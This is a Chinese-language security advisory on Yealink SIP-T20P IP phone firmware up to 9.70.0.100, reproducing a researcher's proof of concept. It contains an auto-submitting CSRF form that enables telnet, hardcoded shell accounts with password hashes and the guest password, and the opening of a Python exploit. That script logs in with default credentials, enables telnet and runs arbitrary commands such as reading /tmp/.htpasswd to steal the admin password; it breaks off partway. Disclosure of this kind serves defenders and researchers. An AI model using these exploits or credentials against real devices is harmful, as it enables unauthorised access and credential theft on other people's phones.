发布日期:2012-12-21
更新日期:2012-12-24
受影响系统:
yealink Yealink SIP-T20P IP Phone <=9.70.0.100
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57029
Yealink SIP-T20P是一款IP电话。
YeaLink IP Phone SIP-TxxP <=9.70.0.100存在多个安全绕过、缓冲区溢出、跨站请求伪造漏洞,攻击者可利用这些漏洞执行任意代码或绕过某些安全限制,执行非法操作。
存在的漏洞简单描述如下:
1) 默认的用户名("user")和密码("user")可以访问隐藏页面<IP>/cgi-bin/ConfigManApp.com?Id=10,该隐藏页面包含启用Telnet功能的选项。
2) 固件包含硬编码的telnet shell用户名和密码;文件"/tmp/.htpasswd"包含有web interface的"admin"用户的密码且该文件为全局可读。
3) 存在跨站请求伪造漏洞。
4) 监听12345端口的/yealink/bin/macd进程存在缓冲区溢出漏洞。
细节见xistence所公布的poc。
<*来源:xistence (xistence@0x90.nl)
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
xistence (xistence@0x90.nl)提供了如下测试方法:
#+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 Multiple Vulnerabilities
# Date : 12-21-2012
# Author : xistence (xistence<[AT]>0x90.nl)
# Software link : ?ProductsID=64&CateID=187&flag=142
# Vendor site :
# Version : 9.70.0.100 and lower
# Tested on : YeaLink IP Phone SIP-T20P (hardware VoIP phone)
#
# Vulnerability : Multiple Vulnerabilities as described below
#
#+--------------------------------------------------------------------------------------------------------------------------------+
[0x01] - Hidden page to enable telnet + CSRF
The hidden page <IP>/cgi-bin/ConfigManApp.com?Id=10 contains an option to enable Telnet on the phone. Only the "admin" user can access this page.
However the unprivileged user "user" can post directly to ConfigManApp.com and enable Telnet. This default user "user" has the password "user" and is unlikely to be changed by a user.
Also CSRF to enable this is possible:
<html>
<head>
<title>Enable Telnet</title> </head>
<body>
<form action="http://<IP>/cgi-bin/ConfigManApp.com" method="post">
<input type="hidden" value="10"/>
<input type="hidden" value="1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260"/>
</form>
<script> document.csrf.submit(); </script>
</body>
</html>
[0x02] - Default telnet shell users + passwords
The shell users are hardcoded in the firmware images and are always the same and can't be changed through the webinterface. So after enabling telnet through the hidden page shell access could go unnoticed.
/etc/passwd:
root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:501:501:Guest,,,:/:/bin/sh
/etc/shadow:
root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7::: <- password is "guest"
/etc/group:
root:x:0:admin,root
guest:x:1:guest
The file "/tmp/.htpasswd" is world readable and contains the "admin" password for the web interface.
[0x03] - Exploit
The following exploit logs in with the unprivileged user "user" and password "user" in the web interface. Here it enables telnet, logs in with the default user "guest" and password "guest" and executes the shell command specified.
An example is to do a "cat /tmp/.htpasswd" to retrieve the admin password for the web interface.
#!/usr/bin/python
import urllib, urllib2, getpass, sys, telnetlib
print ""
print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 hidden page telnet enabler + default guest shell account command execution - xistence (xistence<[at]>0x90.nl) - 2012-12-21"
print ""
if (len(sys.argv) != 3):
print "[*] Usage: " + sys.argv[0] + " <IP of Phone> <command to execute>"
print "[*] i.e.:" + sys.argv[0] + " 127.0.0.1 \"cat /tmp/.htpasswd\""
print ""
exit(0)
phoneIP = sys.argv[1]
shellCmd = sys.argv[2]
phoneUrl = 'http://%s/cgi-bin/ConfigManApp.com' % phoneIP
webUser = 'user'
webPass = 'user'
telnetUser = 'guest'
telnetPass = 'guest'